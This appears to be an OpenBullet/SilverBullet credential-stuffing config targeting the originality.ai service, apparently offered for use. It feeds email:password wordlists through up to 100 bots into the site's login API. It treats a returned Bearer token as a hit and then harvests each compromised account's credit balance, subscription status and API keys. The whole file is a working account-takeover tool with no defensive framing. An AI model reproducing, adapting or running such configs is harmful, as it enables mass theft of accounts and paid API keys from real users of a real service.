[SETTINGS]
{
  "Name": "originality.ai",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-10-26T05:39:30.340592+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Adithyah Nair",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "originality",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://core.originality.ai/api/user/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"captcha\":null}" 
  CONTENTTYPE "application/json" 
  HEADER "Origin: https://app.originality.ai" 
  HEADER "Referer: https://app.originality.ai/" 
  HEADER "Sec-Ch-Ua: \"Chromium\";v=\"118\", \"Google Chrome\";v=\"118\", \"Not=A?Brand\";v=\"99\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"macOS\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Server Error" 
  KEYCHAIN Success OR 
    KEY "Bearer" 

#access_token PARSE "<SOURCE>" LR "\"access_token\":\"" "\",\"refresh_token\"" -> VAR "access_token" 

REQUEST GET "https://core.originality.ai/api/user/account" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Origin: https://app.originality.ai" 
  HEADER "Referer: https://app.originality.ai/" 

#credits PARSE "<SOURCE>" LR "\"current_credits\":" ",\"total_credits_used\"" CreateEmpty=FALSE -> CAP "credits" 

#subscription PARSE "<SOURCE>" LR "\"subscription\":{\"subscribed\":" ",\"period_credits_remaining\"" CreateEmpty=FALSE -> CAP "subscription" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<subscription>" Contains "false" 
  KEYCHAIN Success OR 
    KEY "<subscription>" Contains "true" 

REQUEST GET "https://core.originality.ai/api/user/apiKeys" 
  
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Origin: https://app.originality.ai" 
  HEADER "Referer: https://app.originality.ai/" 
  HEADER "Accept: application/json, text/plain, */*" 

#api_key PARSE "<SOURCE>" LR "\"api_token\":\"" "\",\"status\":" CreateEmpty=FALSE -> CAP "api_key" 

#api_status PARSE "<SOURCE>" LR "\"status\":" ",\"times_used\"" CreateEmpty=FALSE -> CAP "api_status" 

